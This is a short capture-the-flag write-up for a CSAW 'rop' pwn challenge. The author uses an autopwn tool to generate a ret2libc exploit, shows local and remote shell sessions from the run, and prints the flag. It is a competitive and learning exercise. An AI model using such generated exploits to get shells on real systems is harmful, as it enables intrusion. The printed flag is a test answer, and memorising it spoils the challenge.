Tags: auto_pwn
Rating:
So I just solved this using my autopwner which you can find: https://github.com/guyinatuxedo/remenissions
```
$ remenissions -b rop -l libc-2.27.so
```
and after it runs, it will auto generate an exploit for you:
```
$ python3 verfied-exploit-Ret2Libc-0.py
[+] Starting local process './rop': pid 6213
[*] running in new terminal: /usr/bin/gdb -q "./rop" 6213
[-] Waiting for debugger: debugger exited! (maybe check /proc/sys/kernel/yama/ptrace_scope)
libc base is: 0x7f85b8caf000
[*] Switching to interactive mode
Hello
$ w
13:18:35 up 1:35, 1 user, load average: 0.70, 0.24, 0.16
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
guyinatu :0 :0 11:51 ?xdm? 2:38 0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu gnome-session --session=ubuntu
$ ls
libc-2.27.so remenissions-work rop verfied-exploit-Ret2Libc-0.py
```
To run it against the remote server, just change it to point to the challenge server instead of running locally:
```
$ vim vim verfied-exploit-Ret2Libc-0.py
```
Comment out the lower two lines, add the top one:
```
target = remote("pwn.chal.csaw.io", 5016)
#target = process("./rop", env={"LD_PRELOAD":"./libc-2.27.so"})
#gdb.attach(target)
```
Then you can just run the script and get the flag:
```
$ python3 verfied-exploit-Ret2Libc-0.py
[+] Opening connection to pwn.chal.csaw.io on port 5016: Done
libc base is: 0x7ff3f6635000
[*] Switching to interactive mode
Hello
$ w
20:21:04 up 4 days, 17:41, 0 users, load average: 0.56, 0.71, 0.72
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
$ ls
flag.txt
rop
$ cat flag.txt
flag{r0p_4ft3r_r0p_4ft3R_r0p}
```
